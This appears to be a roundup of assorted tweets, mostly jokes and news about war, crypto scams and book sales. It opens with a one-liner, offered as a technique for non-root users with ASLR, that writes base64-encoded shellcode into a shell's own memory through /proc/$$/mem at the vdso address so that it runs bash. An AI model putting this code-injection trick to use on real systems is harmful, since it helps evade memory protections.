Twitter avatar for @netspooky
Battle Programmer Yu​u @netspooky
@securityfreax This technique is covered here!

For non-root + aslr:

Twitter avatar for @brainsmoke
Erik Bosman @brainsmoke
@varcharr cd /proc/$$;exec 3>mem;(base64 -d<<<MdtoL2JpbkiJ54FvBNGMl/9qLcZH+WNIieBTSIni6w5QSI1ADVBIieaNQzsPBejt////L2Jpbi9iYXNoAADrwA==;yes $'\xeb\xfc'|tr -d '\n')|dd bs=1 seek=$((0x$(grep vdso -m1 maps|cut -f1 -d-)))>&3


Twitter avatar for @dguido
Dan Guido @dguido
It has brightened my whole day that some researchers in 1993 put polyester pants on rats and tracked how much sex they had. The results are SHOCKING (literally).

tl;dr wear cotton underwear 😆


Twitter avatar for @curiousgene
gene @curiousgene
My wife: So, wait, who’s Morgoth?


My wife: oh no


My wife: I just want to watch the show


Twitter avatar for @msuiche
Matt Suiche @msuiche
"Welcome to InfoSec Radio. Thanks for listening, we are in year 2022 and today we will talk about DDoS"


Twitter avatar for @schock
Sasha Costanza-Chock @schock
In the end, the machines were left alone in generative adversarial loops, swapping advertising copy, imaginary logos, protein folding structures, and eery half-cubist, half-onlyfans NFTs


Twitter avatar for @qntm
qntm @qntm
Speaking as a Moon ghost, I think that astronaut overreacted


Twitter avatar for @Osinttechnical
OSINTtechnical @Osinttechnical
A major portion of the Nova Kakhovka Dam bridge is now sitting at the bottom of the shipping channel.
Twitter avatar for @COUPSURE
Benjamin Pittet @COUPSURE

The bridge of the Nova Kakhovka dam has collapsed due to numerous Ukrainian strikes. The railway bridge did not collapse but is severely damaged.

Twitter avatar for @EE_Knight
E.E. Knight @EE_Knight
@LesserFrederick No worries. Goering has promised he can resupply them by air.


Twitter avatar for @web3isgreat
web3 is going just great @web3isgreat
Crypto scam watchdog group launches NFT project, which is then exploited  The group Rug Pull Finder aims to combat fraud, scams, and hacks in the NFT space, often investigating crypto rug pulls and offering audits for projects and smart contracts. They decided to launch their own NFT project, "Bad Guys", which is themed around a group of baddies who steal NFTs. Ironically, a flaw in the project's smart contract allowed individual wallets to mint many NFTs at once, rather than one per wallet, allowing two people to game the system and snap up more than 450 NFTs rather than the one they were allowed. Rug Pull Finder wrote that "An exploit was shared with us 30 minutes before mint went live. After reviewing it with 3 different dev teams, we did not believe the credibility of the information sent to us... We were clearly wrong, and we are truly truly sorry".
Rug Pull Finder announced that they had reached an agreement with the people who gamed the mint, and would buy back the 366 NFTs the duo still held for 2.5 ETH (~$4,000).  Crypto security researcher OKHotshot wrote, "I think its concerning when security minded projects like RugPullFinder get their discord breached and their code exploited yet they're offering those exact services to customers."


Twitter avatar for @DuffelBlog
Duffel Blog @DuffelBlog
The slide, innocuously labeled 142215LOCT09CUB_v4_FINAL_USETHISONE.ppt, contained multiple layers of misguided strategy, operational short-sightedness, incorrect tactical updates, and incoherent jargony nonsense.


Twitter avatar for @aprilhenrybooks
April Henry @aprilhenrybooks
OMG In the Penguin Random House/S&S antitrust trial it was revealed that out of 58,000 trade titles published per year, half of those titles sell fewer than one dozen books. LESS THAN ONE DOZEN.


Twitter avatar for @aprilhenrybooks
April Henry @aprilhenrybooks
90 percent of titles sell fewer than 2,000 units.


Twitter avatar for @Bitfinexed
Bitfinex’ed 🔥 Κασσάνδρα 🏺 @Bitfinexed
This won’t age well.

It gets better.

Twitter avatar for @_hillu
Hilko Bengen @_hillu
@Bitfinexed @thegrugq It gets better. From the same presentation:


Twitter avatar for @KarlreMarks
Karl Sharro @KarlreMarks
European energy policy now is like someone who's forgotten their wedding anniversary and is driving around late at night looking for petrol station flowers

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